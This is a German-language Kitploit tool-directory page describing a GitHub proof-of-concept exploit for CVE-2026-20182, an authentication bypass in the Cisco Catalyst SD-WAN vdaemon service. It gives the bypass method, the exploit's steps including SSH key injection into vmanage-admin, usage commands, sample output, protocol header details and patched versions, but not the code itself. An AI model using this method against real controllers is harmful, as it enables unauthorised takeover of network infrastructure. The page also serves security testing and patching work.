Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Umgehung der Authentifizierung (CVSS 10.0) | Kitploit
Tools/GitHubGitHub/portbuster1337/cve-2026-20182
Exploit-FrameworksSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsCloud-SicherheitAuthentifizierungRed Teaming
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Umgehung der Authentifizierung (CVSS 10.0)

Repository anzeigen
3vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2026-20182 — Cisco Catalyst SD-WAN Controller / Manager Authentifizierungsumgehung

Ein Proof-of-Concept-Exploit für CVE-2026-20182, eine kritische (CVSS 10.0) Authentifizierungsumgehung im vdaemon-DTLS-Dienst (UDP/12346) auf Cisco Catalyst SD-WAN Controller (vSmart) und Manager (vManage).

Offengelegt: 14. Mai 2026 von Rapid7 (Stephen Fewer & Jonah Burgess)
CISA KEV: Hinzugefügt am 14. Mai 2026 (Notfall-Direktive 26-03)
CVSS: 10.0 — CWE-287: Fehlerhafte Authentifizierung

Schwachstelle

Der vdaemon-Dienst verwendet einen mehrphasigen DTLS-Handshake, um Control-Plane-Peers zu authentifizieren. Die Funktion vbond_proc_challenge_ack() implementiert eine gerätetypspezifische Zertifikatsprüfung — aber Gerätetyp 2 (vHub) besitzt keinen Prüfpfad. Das Senden eines CHALLENGE_ACK mit device_type=2 führt dazu, dass die Funktion alle Bedingungen durchfällt und peer->authenticated = 1 bedingungslos setzt.

Es sind keine gültigen Anmeldedaten, kein CA-signiertes Zertifikat und keine Kenntnis der SD-WAN-Bereitstellung erforderlich.

Was der Exploit tut

  1. Stellt eine DTLS-1.2-Verbindung zum vdaemon-Dienst des Ziels her (UDP/12346)
  2. Empfängt die CHALLENGE-Nachricht (msg_type=8)
  3. Sendet CHALLENGE_ACK und gibt vor, ein vHub zu sein (device_type=2) → Peer wird als authentifiziert markiert
  4. Sendet HELLO (msg_type=5) → Peer wechselt in den UP-Zustand
  5. Injiziert einen öffentlichen SSH-Schlüssel in /home/vmanage-admin/.ssh/authorized_keys über MSG_VMANAGE_TO_PEER (msg_type=14)
  6. Gewährt NETCONF-Zugriff (SSH TCP/830) oder SSH-Zugriff (TCP/22) als vmanage-admin

Verwendung

root@kitploit:~
python3 cve-2026-20182.py -t <target> [options]

Optionen

ArgumentBeschreibung

Beispiele

root@kitploit:~
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100

# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

Ausgabe

root@kitploit:~
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

Betroffene Versionen

Forschungsreferenzen

  • Rapid7 (ursprüngliche Offenlegung): CVE-2026-20182: Kritische Authentifizierungsumgehung im Cisco Catalyst SD-WAN Controller — Vollständige technische Analyse, dekompilierter Code und Protokolldetails von Stephen Fewer & Jonah Burgess
  • Cisco Security Advisory: cisco-sa-sdwan-rpa2-v69WY2SW — Hersteller-Sicherheitshinweis mit behobenen Versionen
  • CISA KEV: CVE-2026-20182 — Notfall-Direktive 26-03 (Behebung bis 17. Mai 2026)
  • NVD: CVE-2026-20182 — Eintrag der National Vulnerability Database
  • Rapid7-Metasploit-Modul: cisco_sdwan_vhub_auth_bypass — Hilfsmodul im Metasploit-Framework
  • BleepingComputer: Cisco warnt vor neuer kritischer SD-WAN-Sicherheitslücke, die bei Zero-Day-Angriffen ausgenutzt wird
  • Tenable: FAQ zur anhaltenden Ausnutzung von Cisco-SD-WAN-Sicherheitslücken
  • Cisco Talos: Dem Bedrohungsakteur UAT-8616 wird die Ausnutzung dieser Schwachstelle in freier Wildbahn zugeschrieben

Technische Details

Der vdaemon-Protokoll-Header ist 12 Bytes lang:

Gerätetypen: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

Anforderungen

  • Python 3.7+
  • openssl-CLI (für den DTLS-Transport)
  • cryptography-Bibliothek (pip install cryptography)

Haftungsausschluss

Dieser Exploit ist ausschließlich für autorisierte Red-Team-Operationen, Penetrationstests und Sicherheitsforschung an Systemen bestimmt, für die Sie eine ausdrückliche schriftliche Genehmigung besitzen. Die unbefugte Nutzung ist illegal.

Tool herunterladen
-t, --targetZiel-IP oder Hostname
--portvdaemon-UDP-Port (Standard: 12346)
--key-filePfad zu einem vorhandenen öffentlichen SSH-Schlüssel, der injiziert werden soll (optional)
--netconfÜberprüft die Ausnutzung durch Verbindung zu NETCONF über SSH
VersionBehobene Version
< 20.9Migrate to supported release
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1
OffsetGrößeFeldHinweise
01msg_typeNiedriges Nibble = Typ, hohes Nibble = Version
11device_infoHohes Nibble = device_type, niedriges Nibble = flags
21flagsStandardwert 0xA0
31paddingImmer 0x00
4-74domain_idBig-endian uint32
8-114site_idBig-endian uint32